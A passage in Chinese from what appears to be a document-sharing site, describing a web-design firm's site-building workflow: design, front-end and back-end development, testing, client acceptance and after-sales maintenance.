网页设计是正式建站的第一个环节,设计师参加启动会议,需跟客户直接做沟通,详细了解客户公司背景、建站目的、网站所需的设计风格等,并提供样式参考与客户进一步确认,同时搜集设计所需的元素、图片等素材,着手设计首页。首页是关系到整个网站的风格,非常重要,耗时也相对长一些,首页确认后,需要客户签署《网站设计风格确认书》,然后根据合同中的网站架构,逐一设计栏目页和内容页。

设计师注重网站的整体设计,从首页到栏目内页无一不精雕细琢,而不是像一般的建站公司,首页出好再出一两个内页就可以了,其他都交由前端人员去套资料,因为首页是网站的门面,但是内页承载着用户想要了解的企业的所有资讯和内容,同样不容忽视。

2、前端开发:

前端开发岗位是网页设计和程序开发中间的一道桥梁,前端开发人员依照网页设计源文件,用HTML和CSS完成页面制作,把设计稿在互联网上展示出来,

同时,对完成的页面进行维护和对网站前端性能做相应的优化。一名合格的前端开发人员,也应具有一定的审美能力、基础的美工操作能力及程序基础代码识别能力,这样才能很好的与其他岗位协作,发挥承上启下的作用。

3、程序开发:

程序开发人员拿到前端人员架设好的网站框架,在其中添加程序模块,把新闻、产品、留言、会员、购物车等功能逐一实现,通过程序员的操作,浏览者才能在网站上实现互动操作。

三个技术岗位是独立存在、紧密连接的,各个岗位的工作都提前安排和部署好,各个岗位不是固定的先后顺序,而是交错而行的,比如:网页设计师设计网站内页的时候,前端人员已经在裁切首页了,程序人员也同步搭建后台模块了,这样的操作,大大节省了项目操作时间,也避免造成人员的浪费。但是这样操作,对于各岗位的沟通和衔接也是要求很高的,成就各技术岗位高效、优质的协作体制。

在售中阶段还有一项重要的工作,那就是测试。每个技术岗位都有测试标准,“各岗位细节性错误处罚规范”制定多时,时刻监督岗位测试是否合格。

每个岗位都要检测好,保证自己这一岗位没有BUG,同时岗位之间还要交叉测试,最后,项目经理还要整体把关,但是我们要求,网站项目交给项目经理测试时,不允许出现过多的错误。

第三阶段:网站建设的售后阶段:

项目组测试、修改过的没有问题的网站,会集中提交给客户验收,并要求客户提供一次性的修改文本,如果没有问题,则要求客户签署“网站项目确认书”,并按照合同要求支付剩余款项。

网站验收上线后,也不代表工作就结束了,我们会提供售后维护支持工作,对于一年内客户提供的文字、图片等细节修改给予免费支持,对于网站文件出现的BUG,提供终身免费维护、排查的售后服务。对于售后,我们有专门的项目维护组及专业的客户服务部门,保障对客户网站运营维护的服务和支持。

建站的流程说起来寥寥数语,但是却要一贯的坚守和扶持,才能把建站做到一个统一的标准,带给客户无差异的售前、手中和售后服务。

某商业网站渗透分析网站安全

渗透某知名公司内部网络网站安全

最后一个六一儿童节过程作文

《修辞是一个选择过程》

成长是一个过程心情随笔

理解是一个过程作文

网站权重的一个误区

linux下备份拿shell[渗透]网站安全

SEO 是一个过程的概念

如何打造一个标新立异的网站

渗透网站的一个过程(精选8篇)

欢迎下载DOC格式的渗透网站的一个过程,但愿能给您带来参考作用!
推荐度: 推荐 推荐 推荐 推荐 推荐
点击下载文档 文档为doc格式
点击下载本文文档